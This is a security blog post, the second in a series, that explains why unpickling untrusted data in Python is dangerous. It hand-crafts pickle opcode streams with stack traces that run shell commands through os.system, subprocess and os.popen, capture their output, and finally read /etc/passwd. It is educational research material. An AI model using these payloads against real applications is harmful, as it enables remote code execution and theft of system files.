Our Blog

Playing with Python Pickle #2

Reading time ~12 min

[This is the second in a series of posts on Pickle. Link to part one.]

In the previous post I introduced Python’s Pickle mechanism for serializing and deserializing data and provided a bit of background regarding where we came across serialized data, how the virtual machine works and noted that Python intentionally does not perform security checks when unpickling.

In this post, we’ll work through a number of examples that depict exactly why unpickling untrusted data is a dangerous operation. Since we’re going to handcraft Pickle streams, it helps to have an opcode reference handy; here are the opcodes we’ll use:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. It’s actually more subtle than this but this simplification works for us.
  • ( -> push a MARK object onto the stack.
  • S'<string>’\n -> Push <string> object onto the stack.
  • V'<string>’\n -> Push Unicode <string> object onto the stack.
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the object (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated is an argument and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo or register <index>.
  • g<index>\n -> Grab an object from memo or register <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine. If you’re pasting the examples below into larger Pickle streams, make sure to remove the ‘.’

Executing OS commands

In the previous post, the canonical abuse case for unpickling untrusted data was listed:
cos
system
(S'echo hello world'
tR.

Let’s step through this (the stack is included after each step, [SB] indicates the stack bottom):

  1. ‘c’ -> find the callable “os.system”, push the callable onto the stack.
    [SB] [os.system]
  2. ‘(‘ -> push a MARK onto the stack
    [SB] [os.system] [MARK]
  3. “S’echo hello world'” -> push ‘echo hello world’ onto the stack
    [SB] [os.system] [MARK] ['echo hello world']
  4. ‘t’ -> pop “echo hello world” and MARK, push the tuple “(‘echo hello world’)” onto the stack
    [SB] [os.system] [('echo hello world')]
  5. ‘R’ -> pop “(‘echo hello world’)” and “os.system”, call os.system(‘echo hello world’), push the result back on the stack
    [SB] [0]
  6. ‘.’ -> pop the result off the stack and terminate
    [SB], result was '0'

<rat-hole>

Perhaps one instruction that should be clarified is ‘c’, which loads a class based on the two arguments ‘module’ and ‘class’. Pickle’s docs define the behaviour as follows: “The class object module.class is pushed on the stack.  More accurately, the object returned by self.find_class(module, class) is pushed on the stack”. Our previous simplified definition said that the ‘c’ instruction loaded function references, and this is the case, however the full explanation shows that more types than function references can be loaded.

For our purposes we want to load classes that are callable, which is a requirement for the ‘R’ instruction. A callable is an object that has a “__call__” attribute which, if you’re also not a Python programmer, means having to search for more information. An non-expert definition is something like: if the module has functions (e.g. os.system()) then these are suitable for ‘c’. However, class instance method objects (x=Foo();x.bar()) are not suitable for the ‘c’ opcode since it cannot handle class instances. Also worth pointing out that the ‘R’ opcode doesn’t care about what type of object it executes, so long as the object responds to “__call__”. The interplay between ‘c’ and ‘R’ is important for the approach shown later, since ‘c’ is quite limited but ‘R’ can handle more types of objects.

What this rat-hole concludes with is that we have not come across a Pickle example showing how to execute method calls on class instance objects.

</rat-hole>

Let’s try improve on the command execution example; it’s cute for executing commands, but if the unpickling happens on an app server then we won’t see the output of “os.system()” since it returns the retval of the shell rather than stdout/stderr. Any output of the command is printed to the server’s stdout. Thus for our ‘echo hello world’ example, the unpickling returns ‘0’ even though the command successfully ran.

Our first goal is to retrieve the output of commands in the reconstructed object. Initial ideas focused on manipulating the shell’s return value to carry over output:

cos
system
(S'printf -v a \'%d\' "\'`uname -a | sed \'s/.\\{2\\}\\(.\\).*/\\1/\'`";exit $a;'
tR.

This uses a combination of the shell’s backtick and printf statements, sed and exit to return one character at a time in the exit status. However this too is messy; if the output changes between invocations this approach is pretty worthless and it’s also noisy and low bandwidth.

The next option was “os.popen”, however we quickly became bogged down. “os.popen()” returns an instance (e.g. proc=os.popen(“echo foo”)) and in order to access the output of the command, we’d need to call “proc.read()”. However, the pickle instruction set doesn’t appear to support calling instance methods directly as we’ve already mentioned. The next option was to look for other modules, and the ‘subprocess‘ module did the trick with it’s ‘check_output()’ function, which takes an executable and a set of arguments, runs the executable on the arguments and returns the contents as a string:

csubprocess
check_output
(S'uname'
tR.

returns

'Darwin\n'

This looks like good news in that we’re executing commands and viewing output, however the downsides quickly become apparent. “subprocess.check_output” does not invoke a shell, so we can’t simply pass in “uname -a” as a single string, it needs to be broken up into arguments. More importantly though, “check_output” was only added in Python 2.7, so with earlier versions this won’t work. We can easily overcome the first of these hurdles; “check_output” will take arguments specified in a list like so:

subprocess.check_output(["uname", "-a"])

We just need to craft the instructions to create a list and leave it on the stack:

csubprocess
check_output
((S'uname'
S'-a'
ltR.

This is identical to the previous example except for the additional MARK instruction ‘(‘, the ‘-a’ string argument and the ‘l’ instruction to build a list from the previous MARK. This is a rough execution trace of the VM on the instruction sequence:

  1. ‘c’ -> find the callable “subprocess.check_output”, push the callable onto the stack.
    [SB] [subprocess.check_output]
  2. ‘(‘ -> push a MARK onto the stack
    [SB] [subprocess.check_output] [MARK]
  3. ‘(‘ -> push a MARK onto the stack
    [SB] [subprocess.check_output] [MARK] [MARK]
  4. “S’uname'” -> push ‘uname’ onto the stack
    [SB] [subprocess.check_output] [MARK] [MARK] ['uname']
  5. “S’-a'” -> push ‘-a’ onto the stack
    [SB] [subprocess.check_output] [MARK] [MARK] ['uname'] ['-a']
  6. ‘l’ -> pop “uname”, “-a” and MARK, push the list “[‘uname’,’-a’]” onto the stack
    [SB] [subprocess.check_output] [MARK] [['uname','-a']]
  7. ‘t’ -> pop “[‘uname’,’-a’]” and MARK, push the tuple “([‘uname’,’-a’])” onto the stack
    [SB] [subprocess.check_output] [(['uname','-a'])]
  8. ‘R’ -> pop “([‘uname’,’-a’])” and “subprocess.check_output()”, call subprocess.check_output(([‘uname’,’-a’])), push the result back on the stack
    [SB] ['Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n']
  9. ‘.’ -> pop the result off the stack and terminate
    [SB], result was 'Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n'

The result unfortunately carries a trailing newline, which is ugly. We can make use of the virtual machine to clean up the output for us, by calling “string.strip()” on the output:

cstring
strip
(csubprocess
check_output
((S'uname'
S'-a'
ltRtR.

The trace has been omitted since it just includes another function call, but the approach hints at how one might go about dealing with class instances: attempt to call a module function on the class instance.

If the “check_output” method is relied upon, then we’re still stuck with Python 2.7. Ideally we’d like to run “p=os.popen(‘ls -al’);p.read()”, however since the ‘c’ instruction required modules and classes, and could not handle class instances, it was not possible to perform this directly. It bears repetition though that the ‘R’ instruction could handle references to instance methods, since they are inherently callable. Thus we need to find a way to call an instance method using only functions. Cue a diversion into Python’s introspection support:

  • __builtin__.getattr(foo, “attribute”) returns foo.attr. e.g. __builtin__.getattr(file, “read”) -> file.read
  • __builtin__.apply(func, [args]) executes func([args])

Using the introspection tricks and without calling methods on class instances explicitly, we can execute “p=os.popen(‘ls -al’); p.read()” with the following Python:

__builtin__.apply(__builtin__.getattr(file,"read"),[os.popen("ls -al")])

Converted into Pickle, this becomes:

cos
popen
(S'ls -al'
tRp0
0c__builtin__
getattr
(c__builtin__
file
S"read"
tRp1
0c__builtin__
apply
(g1
(g0
ltR.

That’s quite a mouthful, here’s the breakdown:

  1. ‘c’ -> find the callable “os.popen”, push it onto the stack
    [SB] [os.popen]
  2. ‘(‘ -> push a MARK onto the stack
    [SB] [os.popen] [MARK]
  3. “S’ls -al'” -> push ‘ls -al’ onto the stack
    [SB] [os.popen] [MARK] ['ls -al']
  4. ‘t’ -> pop ‘ls -al’ and MARK, push (‘ls -al’)
    [SB] [os.popen] [('ls -al')]
  5. ‘R’ -> pop “os.popen” and “(‘ls -al’)”, call os.popen(‘ls -al’), push the opened file object onto the stack
    [SB] [<open file>]
  6. ‘p0’ -> store “<open file>” in register 0
    [SB] [<open file>]
  7. ‘0’ -> pop and discard topmost stack item
    [SB]
  8. ‘c’ -> find the callable ‘__builtin__.getattr’, push it onto the stack
    [SB] [__builtin__.getattr]
  9. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.getattr] [MARK]
  10. ‘c’ -> find the callable ‘__builtin__.file’, push it onto the stack
    [SB] [__builtin__.getattr] [MARK] [__builtin__.file]
  11. “S’read'” -> push ‘read’ onto the stack
    [SB] [__builtin__.getattr] [MARK] [__builtin__.file] ['read']
  12. ‘t’ -> pop ‘read’, “__builtin__.file” and MARK, push (__builtin__.file, ‘read’)
    [SB] [__builtin__.getattr] [(__builtin__.file, 'read')]
  13. ‘R’ -> pop “__builtin__.getattr” and “(__builtin__.file, ‘read’)”, call __builtin__.getattr(__builtin__.file, ‘read’), push the returned object onto the stack
    [SB] [<method object for 'file.read'>]
  14. ‘p1’ -> store “<method object for ‘file.read’>” in register 1
    [SB] [<method object for 'file.read'>]
  15. ‘0’ -> pop and discard topmost stack item
    [SB]
  16. ‘c’ -> find the callable ‘__builtin__.apply’, push it onto the stack
    [SB] [__builtin__.apply]
  17. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.apply] [MARK]
  18. ‘g1’ -> retrive contents of register 1, push onto stack
    [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>]
  19. ‘(‘ -> push a MARK onto the stack
    [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK]
  20. ‘g0’ -> retrive contents of register 0, push onto stack
    [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK] [<open file>]
  21. ‘l’ -> pop “<open file>” and MARK, push the list “[<open file>]”
    [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [[<open file>]]
  22. ‘t’ -> pop ‘<method object for ‘<file.read’>’, “[<open file>]” and MARK, push the tuple “(<file.read’>, ‘[<open file>])”
    [SB] [__builtin__.apply] [(<method object for 'file.read'>,[<open file>])]
  23. ‘R’ -> pop “__builtin__.apply” and “(<method object for ‘file.read’>,[<open file>])”, call __builtin__.apply(<method object for ‘file.read’>,[<open file>]), push the returned object onto the stack
    [SB] ['lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n']
  24. ‘.’ -> pop the result off the stack and terminate
    [SB], returned string was "lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n"

This is really useful, since we can now return command output in any Python version that supports Pickle.

That’s enough Pickle for today, I’ll leave you with a final modification of the above pickle string, that reads and returns the contents of files:

c__builtin__
file
(S"/etc/passwd"
tRp0
0c__builtin__
getattr
(c__builtin__
file
S"read"
tRp1
0c__builtin__
apply
(g1
(g0
ltR.